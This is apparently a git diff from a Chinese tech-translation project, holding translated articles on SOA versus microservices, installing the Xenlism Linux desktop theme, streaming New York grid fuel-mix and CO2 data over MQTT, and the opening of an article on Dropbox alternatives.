与其说 SOA 是模块化一个应用程序,还不如说它是把分布式的、独立维护和部署的组件,组合成一个应用程序。然后在服务器上运行这些组件。
|
||||||
|
|
||||||
|
早期版本的 SOA 使用面向对象的协议进行组件间通讯。例如,微软的 [分布式组件对象模型 (DCOM)][3] 和使用 [通用对象请求代理架构 (CORBA)][5] 规范的 [对象请求代理 (ORBs)][4]。
|
||||||
|
|
||||||
|
用于消息服务的最新版本,比如 [Java 消息服务 (JMS)][6] 或者 [高级消息队列协议 (AMQP)][7]。这些服务通过企业服务总线 (ESB) 进行连接。基于这些总线,来传递和接收可扩展标记语言(XML)格式的数据。
|
||||||
|
|
||||||
|
[微服务][2] 是一个架构样式,其中的应用程序以松散耦合的服务或模块组成。它适用于开发大型的、复杂的应用程序的持续集成/持续部署(CI/CD)模型。一个应用程序就是一堆模块的汇总。
|
||||||
|
|
||||||
|
每个微服务提供一个应用程序编程接口(API)端点。它们通过轻量级协议连接,比如,[表述性状态转移 (REST)][8],或 [gRPC][9]。数据倾向于使用 [JavaScript 对象标记 (JSON)][10] 或 [Protobuf][11] 来表示。
|
||||||
|
|
||||||
|
这两种架构都可以用于去替代以前老的整体式架构,整体式架构的应用程序被构建为单个自治的单元。例如,在一个客户机 - 服务器模式中,一个典型的 Linux、Apache、MySQL、PHP/Python/Perl (LAMP) 服务器端应用程序将去处理 HTTP 请求、运行子程序、以及从底层的 MySQL 数据库中检索/更新数据。所有这些应用程序”绑“在一起提供服务。当你改变了任何一个东西,你都必须去构建和部署一个新版本。
|
||||||
|
|
||||||
|
使用 SOA,你可以只改变需要的几个组件,而不是整个应用程序。使用微服务,你可以做到一次只改变一个服务。使用微服务,你才能真正做到一个解耦架构。
|
||||||
|
|
||||||
|
微服务也比 SOA 更轻量级。不过 SOA 服务是部署到服务器和虚拟机上,而微服务是部署在容器中。协议也更轻量级。这使得微服务比 SOA 更灵活。因此,它更适合于要求敏捷性的电商网站。
|
||||||
|
|
||||||
|
说了这么多,到底意味着什么呢?微服务就是 SOA 在容器和云计算上的变种。
|
||||||
|
|
||||||
|
老式的 SOA 并没有离我们远去,但是,因为我们持续将应用程序搬迁到容器中,所以微服务架构将越来越流行。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://blogs.dxc.technology/2018/05/08/everything-old-is-new-again-microservices/
|
||||||
|
|
||||||
|
作者:[Cloudy Weather][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[qhwdw](https://github.com/qhwdw)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://blogs.dxc.technology/author/steven-vaughan-nichols/
|
||||||
|
[1]:https://www.service-architecture.com/articles/web-services/service-oriented_architecture_soa_definition.html
|
||||||
|
[2]:http://microservices.io/
|
||||||
|
[3]:https://technet.microsoft.com/en-us/library/cc958799.aspx
|
||||||
|
[4]:https://searchmicroservices.techtarget.com/definition/Object-Request-Broker-ORB
|
||||||
|
[5]:http://www.corba.org/
|
||||||
|
[6]:https://docs.oracle.com/javaee/6/tutorial/doc/bncdq.html
|
||||||
|
[7]:https://www.amqp.org/
|
||||||
|
[8]:https://www.service-architecture.com/articles/web-services/representational_state_transfer_rest.html
|
||||||
|
[9]:https://grpc.io/
|
||||||
|
[10]:https://www.json.org/
|
||||||
|
[11]:https://github.com/google/protobuf/
|
@ -0,0 +1,92 @@
|
|||||||
|
使用 Xenlism 主题为你的 Linux 桌面带来令人惊叹的改造
|
||||||
|
============================================================
|
||||||
|
|
||||||
|
|
||||||
|
_简介:Xenlism 主题包提供了一个美观的 GTK 主题、彩色图标和简约壁纸,将你的 Linux 桌面转变为引人注目的设置._
|
||||||
|
|
||||||
|
除非我找到一些非常棒的东西,否则我不会每天都把整篇文章献给一个主题。我曾经经常发布主题和图标。但最近,我更喜欢列出[最佳 GTK 主题][6]和图标主题。这对我和你来说都更方便,你可以在一个地方看到许多美丽的主题。
|
||||||
|
|
||||||
|
在[ Pop OS 主题][7]套件之后,Xenlism 是另一个让我对它的外观感到震惊的主题。
|
||||||
|
|
||||||
|
![Xenlism GTK theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlishm-minimalism-gtk-theme-800x450.jpeg)
|
||||||
|
|
||||||
|
Xenlism GTK 主题基于 Arc 主题,这后面有许多主题的灵感。GTK 主题提供类似于 macOS 的 Windows 按钮,我既没有喜欢,也没有不喜欢。GTK 主题采用扁平、简约的布局,我喜欢这样。
|
||||||
|
|
||||||
|
Xenlism 套件中有两个图标主题。Xenlism Wildfire是以前的,已经进入我们的[最佳图标主题][8]列表。
|
||||||
|
|
||||||
|
![Beautiful Xenlism Wildfire theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlism-wildfire-theme-800x450.jpeg)
|
||||||
|
Xenlism Wildfire 图标
|
||||||
|
|
||||||
|
Xenlsim Storm 是一个相对较新的图标主题,但同样美观。
|
||||||
|
|
||||||
|
![Beautiful Xenlism Storm theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlism-storm-theme-1-800x450.jpeg)
|
||||||
|
Xenlism Storm 图标
|
||||||
|
|
||||||
|
Xenlism 主题在 GPL 许可下的开源。
|
||||||
|
|
||||||
|
### 如何在 Ubuntu 18.04 上安装 Xenlism 主题包
|
||||||
|
|
||||||
|
Xenlism 开发提供了一种通过 PPA 安装主题包的更简单方法。尽管 PPA 可用于 Ubuntu 16.04,但我发现 GTK 主题不适用于 Unity。它适用于 Ubuntu 18.04 中的 GNOME 桌面。
|
||||||
|
|
||||||
|
打开终端(Ctrl+Alt+T)并逐个使用以下命令:
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo add-apt-repository ppa:xenatt/xenlism
|
||||||
|
sudo apt update
|
||||||
|
```
|
||||||
|
|
||||||
|
该 PPA 提供四个包:
|
||||||
|
|
||||||
|
* xenlism-finewalls:一组壁纸,可直接在 Ubuntu 的壁纸中使用。截图中使用了其中一个壁纸。
|
||||||
|
|
||||||
|
* xenlism-minimalism-theme:GTK主题
|
||||||
|
|
||||||
|
* xenlism-storm:一个图标主题(见前面的截图)
|
||||||
|
|
||||||
|
* xenlism-wildfire-icon-theme:具有多种颜色变化的另一个图标主题(文件夹颜色在变体中更改)
|
||||||
|
|
||||||
|
你可以自己决定要安装的主题组件。就个人而言,我认为安装所有组件没有任何损害。
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo apt install xenlism-minimalism-theme xenlism-storm-icon-theme xenlism-wildfire-icon-theme xenlism-finewalls
|
||||||
|
```
|
||||||
|
|
||||||
|
你可以使用 GNOME Tweaks 来更改主题和图标。如果你不熟悉该过程,我建议你阅读本教程以学习[如何在 Ubuntu 18.04 GNOME 中安装主题][9]。
|
||||||
|
|
||||||
|
### 在其他 Linux 发行版中获取 Xenlism 主题
|
||||||
|
|
||||||
|
你也可以在其他 Linux 发行版上安装 Xenlism 主题。各种 Linux 发行版的安装说明可在其网站上找到:
|
||||||
|
|
||||||
|
[安装 Xenlism 主题][10]
|
||||||
|
|
||||||
|
### 你怎么看?
|
||||||
|
|
||||||
|
我知道不是每个人都会同意我,但我喜欢这个主题。我想你将来会在 It's FOSS 的教程中会看到 Xenlism 主题的截图。
|
||||||
|
|
||||||
|
你喜欢 Xenlism 主题吗?如果不喜欢,你最喜欢什么主题?在下面的评论部分分享你的意见。
|
||||||
|
|
||||||
|
#### 关于作者
|
||||||
|
|
||||||
|
我是一名专业软件开发人员,也是 It's FOSS 的创始人。我是一名狂热的 Linux 爱好者和开源爱好者。我使用 Ubuntu 并相信分享知识。除了Linux,我喜欢经典侦探之谜。我是 Agatha Christie 作品的忠实粉丝。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://itsfoss.com/xenlism-theme/
|
||||||
|
|
||||||
|
作者:[Abhishek Prakash ][a]
|
||||||
|
译者:[geekpi](https://github.com/geekpi)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://itsfoss.com/author/abhishek/
|
||||||
|
[1]:https://itsfoss.com/author/abhishek/
|
||||||
|
[2]:https://itsfoss.com/xenlism-theme/#comments
|
||||||
|
[3]:https://itsfoss.com/category/desktop/
|
||||||
|
[4]:https://itsfoss.com/tag/themes/
|
||||||
|
[5]:https://itsfoss.com/tag/xenlism/
|
||||||
|
[6]:https://itsfoss.com/best-gtk-themes/
|
||||||
|
[7]:https://itsfoss.com/pop-icon-gtk-theme-ubuntu/
|
||||||
|
[8]:https://itsfoss.com/best-icon-themes-ubuntu-16-04/
|
||||||
|
[9]:https://itsfoss.com/install-themes-ubuntu/
|
||||||
|
[10]:http://xenlism.github.io/minimalism/#install
|
@ -0,0 +1,256 @@
|
|||||||
|
使用 MQTT 实现项目数据收发
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/toolbox-learn-draw-container-yearbook.png?itok=xDbwz1pP)
|
||||||
|
|
||||||
|
去年 11 月我们购买了一辆电动汽车,同时也引发了有趣的思考:我们应该什么时候为电动汽车充电?对于电动汽车充电所用的电,我希望能够对应最小的二氧化碳排放,归结为一个特定的问题:对于任意给定时刻,每千瓦时对应的二氧化碳排放量是多少,一天中什么时间这个值最低?
|
||||||
|
|
||||||
|
|
||||||
|
### 寻找数据
|
||||||
|
|
||||||
|
我住在纽约州,大约 80% 的电力消耗可以自给自足,主要来自天然气、水坝(大部分来自于<ruby>尼亚加拉<rt>Niagara</rt></ruby>大瀑布)、核能发电,少部分来自风力、太阳能和其它化石燃料发电。非盈利性组织 [<ruby>纽约独立电网运营商<rt>New York Independent System Operator</rt></ruby>][1] (NYISO) 负责整个系统的运作,实现发电机组发电与用电之间的平衡,同时也是纽约路灯系统的监管部门。
|
||||||
|
|
||||||
|
尽管没有为公众提供公开 API,NYISO 还是尽责提供了[不少公开数据][2]供公众使用。每隔 5 分钟汇报全州各个发电机组消耗的燃料数据。数据以 CSV 文件的形式发布于公开的档案库中,全天更新。如果你了解不同燃料对发电瓦数的贡献比例,你可以比较准确的估计任意时刻的二氧化碳排放情况。
|
||||||
|
|
||||||
|
在构建收集处理公开数据的工具时,我们应该时刻避免过度使用这些资源。相比将这些数据打包并发送给所有人,我们有更好的方案。我们可以创建一个低开销的<ruby>事件流<rt>event stream</rt></ruby>,人们可以订阅并第一时间得到消息。我们可以使用 [MQTT][3] 实现该方案。我的 ([ny-power.org][4]) 项目目标是收录到 [Home Assistant][5] 项目中;后者是一个开源的<ruby>家庭自动化<rt>home automation</rt></ruby>平台,拥有数十万用户。如果所有用户同时访问 CSV 文件服务器,估计 NYISO 不得不增加访问限制。
|
||||||
|
|
||||||
|
### MQTT 是什么?
|
||||||
|
|
||||||
|
MQTT 是一个<ruby>发布订阅线协议<rt>publish/subscription wire protocol</rt></ruby>,为小规模设备设计。发布订阅系统工作原理类似于消息总线。你将一条消息发布到一个<ruby>主题<rt>topic</rt></ruby>上,那么所有订阅了该主题的客户端都可以获得该消息的一份拷贝。对于消息发送者而言,无需知道哪些人在订阅消息;你只需将消息发布到一系列主题,同时订阅一些你感兴趣的主题。就像参加了一场聚会,你选取并加入感兴趣的对话。
|
||||||
|
|
||||||
|
MQTT 可应用构建极为高效的应用。客户端订阅有限的几个主题,也只收到他们感兴趣的内容。不仅节省了处理时间,还降低了网络带宽使用。
|
||||||
|
|
||||||
|
作为一个开放标准,MQTT 有很多开源的客户端和服务端实现。对于你能想到的每种编程语言,都有对应的客户端库;甚至有嵌入到 Arduino 的库,可以构建传感器网络。服务端可供选择的也很多,我的选择是 Eclipse 项目提供的 [Mosquitto][6] 服务端,这是因为它体积小、用 C 编写,可以承载数以万计的订阅者。
|
||||||
|
|
||||||
|
### 为何我喜爱 MQTT
|
||||||
|
|
||||||
|
在过去二十年间,我们为软件应用设计了可靠且准确的模型,用于解决服务遇到的问题。我还有其它邮件吗?当前的天气情况如何?我应该此刻购买这种产品吗?在绝大多数情况下,这种<ruby>问答式<rt>ask/receive</rt></ruby>的模型工作良好;但对于一个数据爆炸的世界,我们需要其它的模型。MQTT 的发布订阅模型十分强大,可以将大量数据发送到系统中。客户可以订阅数据中的一小部分并在订阅数据发布的第一时间收到更新。
|
||||||
|
|
||||||
|
MQTT 还有一些有趣的特性,其中之一是<ruby>遗嘱<rt>last-will-and-testament</rt></ruby>消息,可以用于区分两种不同的静默,一种是没有主题相关数据推送,另一种是你的数据接收器出现故障。MQTT 还包括<ruby>保留消息<rt>retained message</rt></ruby>,当客户端初次连接时会提供相关主题的最后一条消息。这对那些更新缓慢的主题来说很有必要。
|
||||||
|
|
||||||
|
我在 Home Assistant 项目开发过程中,发现这种消息总线模型对<ruby>异构系统<rt>heterogeneous systems</rt></ruby>尤为适合。如果你深入<ruby>物联网<rt>Internet of Things</rt></ruby>领域,你会发现 MQTT 无处不在。
|
||||||
|
|
||||||
|
### 我们的第一个 MQTT 流
|
||||||
|
|
||||||
|
NYSO 公布的 CSV 文件中有一个是实时的燃料混合使用情况。每 5 分钟,NYSO 发布这 5 分钟内发电使用的燃料类型和相应的发电量(以兆瓦为单位)。
|
||||||
|
|
||||||
|
The CSV file looks something like this:
|
||||||
|
|
||||||
|
| 时间戳 | 时区 | 燃料类型 | 兆瓦为单位的发电量 |
|
||||||
|
| --- | --- | --- | --- |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 混合燃料 | 1400 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 天然气 | 2144 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 核能 | 4114 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 其它化石燃料 | 4 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 其它可再生资源 | 226 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 风力 | 1 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 水力 | 3229 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 混合燃料 | 1307 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 天然气 | 2092 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 核能 | 4115 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 其它化石燃料 | 4 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 其它可再生资源 | 224 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 风力 | 40 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 水力 | 3166 |
|
||||||
|
|
||||||
|
表中唯一令人不解就是燃料类别中的混合燃料。纽约的大多数天然气工厂也通过燃烧其它类型的化石燃料发电。在冬季寒潮到来之际,家庭供暖的优先级高于发电;但这种情况出现的次数不多,(在我们计算中)可以将混合燃料类型看作天然气类型。
|
||||||
|
|
||||||
|
CSV 文件全天更新。我编写了一个简单的数据泵,每隔 1 分钟检查是否有数据更新,并将新条目发布到 MQTT 服务器的一系列主题上,主题名称基本与 CSV 文件有一定的对应关系。数据内容被转换为 JSON 对象,方便各种编程语言处理。
|
||||||
|
|
||||||
|
```
|
||||||
|
ny-power/upstream/fuel-mix/Hydro {"units": "MW", "value": 3229, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Dual Fuel {"units": "MW", "value": 1400, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Natural Gas {"units": "MW", "value": 2144, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Other Fossil Fuels {"units": "MW", "value": 4, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Wind {"units": "MW", "value": 41, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Other Renewables {"units": "MW", "value": 226, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Nuclear {"units": "MW", "value": 4114, "ts": "05/09/2018 00:05:00"}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
这种直接的转换是种不错的尝试,可将公开数据转换为公开事件。我们后续会继续将数据转换为二氧化碳排放强度,但这些原始数据还可被其它应用使用,用于其它计算用途。
|
||||||
|
|
||||||
|
### MQTT 主题
|
||||||
|
|
||||||
|
主题和<ruby>主题结构<rt>topic structure</rt></ruby>是 MQTT 的一个主要特色。与其它标准的企业级消息总线不同,MQTT 的主题无需事先注册。发送者可以凭空创建主题,唯一的限制是主题的长度,不超过 220 字符。其中 `/` 字符有特殊含义,用于创建主题的层次结构。我们即将看到,你可以订阅这些层次中的一些分片。
|
||||||
|
|
||||||
|
基于开箱即用的 Mosquitto,任何一个客户端都可以向任何主题发布消息。在原型设计过程中,这种方式十分便利;但一旦部署到生产环境,你需要增加<ruby>访问控制列表<rt>access control list, ACL</rt></ruby>只允许授权的应用发布消息。例如,任何人都能以只读的方式访问我的应用的主题层级,但只有那些具有特定<ruby>凭证<rt>credentials</rt></ruby>的客户端可以发布内容。
|
||||||
|
|
||||||
|
主题中不包含<ruby>自动样式<rt>automatic schema</rt></ruby>,也没有方法查找客户端可以发布的全部主题。因此,对于那些从 MQTT 总线消费数据的应用,你需要让其直接使用已知的主题和消息格式样式。
|
||||||
|
|
||||||
|
那么应该如何设计主题呢?最佳实践包括使用应用相关的根名称,例如在我的应用中使用 `ny-power`。接着,为提高订阅效率,构建足够深的层次结构。`upstream` 层次结构包含了直接从数据源获取的、不经处理的原始数据,而 `fuel-mix` 层次结构包含特定类型的数据;我们后续还可以增加其它的层次结构。
|
||||||
|
|
||||||
|
### 订阅主题
|
||||||
|
|
||||||
|
在 MQTT 中,订阅仅仅是简单的字符串匹配。为提高处理效率,只允许如下两种通配符:
|
||||||
|
|
||||||
|
* `#` 以递归方式匹配,直到字符串结束
|
||||||
|
* `+` 匹配下一个 `/` 之前的内容
|
||||||
|
|
||||||
|
|
||||||
|
为便于理解,下面给出几个例子:
|
||||||
|
```
|
||||||
|
ny-power/# - 匹配 ny-power 应用发布的全部主题
|
||||||
|
ny-power/upstream/# - 匹配全部原始数据的主题
|
||||||
|
ny-power/upstream/fuel-mix/+ - 匹配全部燃料类型的主题
|
||||||
|
ny-power/+/+/Hydro - 匹配全部两次层级之后为 Hydro 类型的主题(即使不位于 upstream 层次结构下)
|
||||||
|
```
|
||||||
|
|
||||||
|
类似 `ny-power/#` 的大范围订阅适用于<ruby>低数据量<rt>low-volume</rt></ruby>的应用,应用从网络获取全部数据并处理。但对<ruby>高数据量<rt>high-volume</rt></ruby>应用而言则是一个灾难,由于绝大多数消息并不会被使用,大部分的网络带宽被白白浪费了。
|
||||||
|
|
||||||
|
在大数据量情况下,为确保性能,应用需要使用恰当的主题筛选(如 `ny-power/+/+/Hydro`)尽量准确获取业务所需的数据。
|
||||||
|
|
||||||
|
### 增加我们自己的数据层次
|
||||||
|
|
||||||
|
接下来,应用中的一切都依赖于已有的 MQTT 流并构建新流。第一个额外的数据层用于计算发电对应的二氧化碳排放。
|
||||||
|
|
||||||
|
利用[<ruby>美国能源情报署<rt>U.S. Energy Information Administration</rt></ruby>][7] 给出的 2016 年纽约各类燃料发电及排放情况,我们可以给出各类燃料的[平均排放率][8],单位为克/兆瓦时。
|
||||||
|
|
||||||
|
上述结果被封装到一个专用的微服务中。该微服务订阅 `ny-power/upstream/fuel-mix/+`,即数据泵中燃料组成情况的原始数据,接着完成计算并将结果(单位为克/千瓦时)发布到新的主题层次结构上:
|
||||||
|
```
|
||||||
|
ny-power/computed/co2 {"units": "g / kWh", "value": 152.9486, "ts": "05/09/2018 00:05:00"}
|
||||||
|
```
|
||||||
|
|
||||||
|
接着,另一个服务会订阅该主题层次结构并将数据打包到 [InfluxDB][9] 进程中;同时,发布 24 小时内的时间序列数据到 `ny-power/archive/co2/24h` 主题,这样可以大大简化当前变化数据的绘制。
|
||||||
|
|
||||||
|
这种层次结构的主题模型效果不错,可以将上述程序之间的逻辑解耦合。在复杂系统中,各个组件可能使用不同的编程语言,但这并不重要,因为交换格式都是 MQTT 消息,即主题和 JSON 格式的消息内容。
|
||||||
|
|
||||||
|
### 从终端消费数据
|
||||||
|
|
||||||
|
为了更好的了解 MQTT 完成了什么工作,将其绑定到一个消息总线并查看消息流是个不错的方法。`mosquitto-clients` 包中的 `mosquitto_sub` 可以让我们轻松实现该目标。
|
||||||
|
|
||||||
|
安装程序后,你需要提供服务器名称以及你要订阅的主题。如果有需要,使用参数 `-v` 可以让你看到有新消息发布的那些主题;否则,你只能看到主题内的消息数据。
|
||||||
|
|
||||||
|
```
|
||||||
|
mosquitto_sub -h mqtt.ny-power.org -t ny-power/# -v
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
只要我编写或调试 MQTT 应用,我总会在一个终端中运行 `mosquitto_sub`。
|
||||||
|
|
||||||
|
### 从网页直接访问 MQTT
|
||||||
|
|
||||||
|
到目前为止,我们已经有提供公开事件流的应用,可以用微服务或命令行工具访问该应用。但考虑到互联网仍占据主导地位,因此让用户可以从浏览器直接获取事件流是很重要。
|
||||||
|
|
||||||
|
MQTT 的设计者已经考虑到了这一点。协议标准支持三种不同的传输协议:[TCP][10],[UDP][11] 和 [WebSockets][12]。主流浏览器都支持 WebSockets,可以维持持久连接,用于实时应用。
|
||||||
|
|
||||||
|
Eclipse 项目提供了 MQTT 的一个 JavaScript 实现,叫做 [Paho][13],可包含在你的应用中。工作模式为与服务器建立连接、建立一些订阅,然后根据接收到的消息进行响应。
|
||||||
|
|
||||||
|
```
|
||||||
|
// ny-power web console application
|
||||||
|
|
||||||
|
var client = new Paho.MQTT.Client(mqttHost, Number("80"), "client-" + Math.random());
|
||||||
|
|
||||||
|
// set callback handlers
|
||||||
|
client.onMessageArrived = onMessageArrived;
|
||||||
|
|
||||||
|
// connect the client
|
||||||
|
client.reconnect = true;
|
||||||
|
client.connect({onSuccess: onConnect});
|
||||||
|
|
||||||
|
// called when the client connects
|
||||||
|
function onConnect() {
|
||||||
|
// Once a connection has been made, make a subscription and send a message.
|
||||||
|
console.log("onConnect");
|
||||||
|
client.subscribe("ny-power/computed/co2");
|
||||||
|
client.subscribe("ny-power/archive/co2/24h");
|
||||||
|
client.subscribe("ny-power/upstream/fuel-mix/#");
|
||||||
|
}
|
||||||
|
|
||||||
|
// called when a message arrives
|
||||||
|
function onMessageArrived(message) {
|
||||||
|
console.log("onMessageArrived:"+message.destinationName + message.payloadString);
|
||||||
|
if (message.destinationName == "ny-power/computed/co2") {
|
||||||
|
var data = JSON.parse(message.payloadString);
|
||||||
|
$("#co2-per-kwh").html(Math.round(data.value));
|
||||||
|
$("#co2-units").html(data.units);
|
||||||
|
$("#co2-updated").html(data.ts);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (message.destinationName.startsWith("ny-power/upstream/fuel-mix")) {
|
||||||
|
fuel_mix_graph(message);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (message.destinationName == "ny-power/archive/co2/24h") {
|
||||||
|
var data = JSON.parse(message.payloadString);
|
||||||
|
var plot = [
|
||||||
|
{
|
||||||
|
x: data.ts,
|
||||||
|
y: data.values,
|
||||||
|
type: 'scatter'
|
||||||
|
}
|
||||||
|
];
|
||||||
|
var layout = {
|
||||||
|
yaxis: {
|
||||||
|
title: "g CO2 / kWh",
|
||||||
|
}
|
||||||
|
};
|
||||||
|
Plotly.newPlot('co2_graph', plot, layout);
|
||||||
|
}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
上述应用订阅了不少主题,因为我们将要呈现若干种不同类型的数据;其中 `ny-power/computed/co2` 主题为我们提供当前二氧化碳排放的参考值。一旦收到该主题的新消息,网站上的相应内容会被相应替换。
|
||||||
|
|
||||||
|
|
||||||
|
![NYISO 二氧化碳排放图][15]
|
||||||
|
|
||||||
|
[ny-power.org][4] 网站提供的 NYISO 二氧化碳排放图。
|
||||||
|
|
||||||
|
`ny-power/archive/co2/24h` 主题提供了时间序列数据,用于为 [Plotly][16] 线表提供数据。`ny-power/upstream/fuel-mix` 主题提供当前燃料组成情况,为漂亮的柱状图提供数据。
|
||||||
|
|
||||||
|
![NYISO 燃料组成情况][18]
|
||||||
|
|
||||||
|
[ny-power.org][4] 网站提供的燃料组成情况。
|
||||||
|
|
||||||
|
这是一个动态网站,数据不从服务器拉取,而是结合 MQTT 消息总线,监听对外开放的 WebSocket。就像数据泵和打包器程序那样,网站页面也是一个发布订阅客户端,只不过是在你的浏览器中执行,而不是在公有云的微服务上。
|
||||||
|
|
||||||
|
你可以在 <http://ny-power.org> 站点点看到动态变更,包括图像和可以看到消息到达的实时 MQTT 终端。
|
||||||
|
|
||||||
|
### 继续深入
|
||||||
|
|
||||||
|
ny-power.org 应用的完整内容开源在 [GitHub][19] 中。你也可以查阅 [架构简介][20],学习如何使用 [Helm][21] 部署一系列 Kubernetes 微服务构建应用。另一个有趣的 MQTT 示例使用 MQTT 和 OpenWhisk 进行实时文本消息翻译,<ruby>代码模式<rt>code pattern</rt></ruby>参考[链接][22]。
|
||||||
|
|
||||||
|
MQTT 被广泛应用于物联网领域,更多关于 MQTT 用途的例子可以在 [Home Assistant][23] 项目中找到。
|
||||||
|
|
||||||
|
如果你希望深入了解协议内容,可以从 [mqtt.org][3] 获得该公开标准的全部细节。
|
||||||
|
|
||||||
|
想了解更多,可以参加 Sean Dague 在 [OSCON][25] 上的演讲,主题为 [将 MQTT 加入到你的工具箱][24],会议将于 7 月 16-19 日在奥尔良州波特兰举办。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/6/mqtt
|
||||||
|
|
||||||
|
作者:[Sean Dague][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/sdague
|
||||||
|
[1]:http://www.nyiso.com/public/index.jsp
|
||||||
|
[2]:http://www.nyiso.com/public/markets_operations/market_data/reports_info/index.jsp
|
||||||
|
[3]:http://mqtt.org/
|
||||||
|
[4]:http://ny-power.org/#
|
||||||
|
[5]:https://www.home-assistant.io
|
||||||
|
[6]:https://mosquitto.org/
|
||||||
|
[7]:https://www.eia.gov/
|
||||||
|
[8]:https://github.com/IBM/ny-power/blob/master/src/nypower/calc.py#L1-L60
|
||||||
|
[9]:https://www.influxdata.com/
|
||||||
|
[10]:https://en.wikipedia.org/wiki/Transmission_Control_Protocol
|
||||||
|
[11]:https://en.wikipedia.org/wiki/User_Datagram_Protocol
|
||||||
|
[12]:https://en.wikipedia.org/wiki/WebSocket
|
||||||
|
[13]:https://www.eclipse.org/paho/
|
||||||
|
[14]:/file/400041
|
||||||
|
[15]:https://opensource.com/sites/default/files/uploads/mqtt_nyiso-co2intensity.png (NY ISO Grid CO2 Intensity)
|
||||||
|
[16]:https://plot.ly/
|
||||||
|
[17]:/file/400046
|
||||||
|
[18]:https://opensource.com/sites/default/files/uploads/mqtt_nyiso_fuel-mix.png (Fuel mix on NYISO grid)
|
||||||
|
[19]:https://github.com/IBM/ny-power
|
||||||
|
[20]:https://developer.ibm.com/code/patterns/use-mqtt-stream-real-time-data/
|
||||||
|
[21]:https://helm.sh/
|
||||||
|
[22]:https://developer.ibm.com/code/patterns/deploy-serverless-multilingual-conference-room/
|
||||||
|
[23]:https://www.home-assistant.io/
|
||||||
|
[24]:https://conferences.oreilly.com/oscon/oscon-or/public/schedule/speaker/77317
|
||||||
|
[25]:https://conferences.oreilly.com/oscon/oscon-or
|
@ -1,115 +0,0 @@
|
|||||||
可代替Dropbox的5个开源软件
|
|
||||||
=====
|
|
||||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/dropbox.jpg?itok=qFwcqboT)
|
|
||||||
|
|
||||||
Dropbox 在文件共享应用中是个 800 磅的大猩猩。尽管它是个极度流行的工具,但你可能仍想使用一个软件去替代它。
|
|
||||||
|
|
||||||
出于所有的好的原因, 包括安全和自由,这使你决定用[开源方式][1]。或许你已经被数据泄露吓坏了。或者定价计划不能满足你实际需要的存储量。
|
|
||||||
|
|
||||||
幸运的是,有各种各样的开源文件共享应用,可以提供给你更多的存储容量,更好的安全性,并且以低于 Dropbox 很多的价格来让你掌控你自己的数据。有多低呢?如果你有一定的技术和一台 Linux 服务器可供使用,那尝试一下免费的应用吧。
|
|
||||||
|
|
||||||
这里有5个最好的可以代替 Dropbox 的开源应用,以及其他一些,你可能想考虑使用。
|
|
||||||
|
|
||||||
### ownCloud
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/owncloud.png)
|
|
||||||
|
|
||||||
[ownCloud][2]发布于 2010 年,是本文所列应用中最老的,但是不要被这件事蒙蔽:它仍然十分流行(根据公司统计,有超过 150 万用户),并且由 1100 个参与者的社区积极维护, 定期发布更新。
|
|
||||||
|
|
||||||
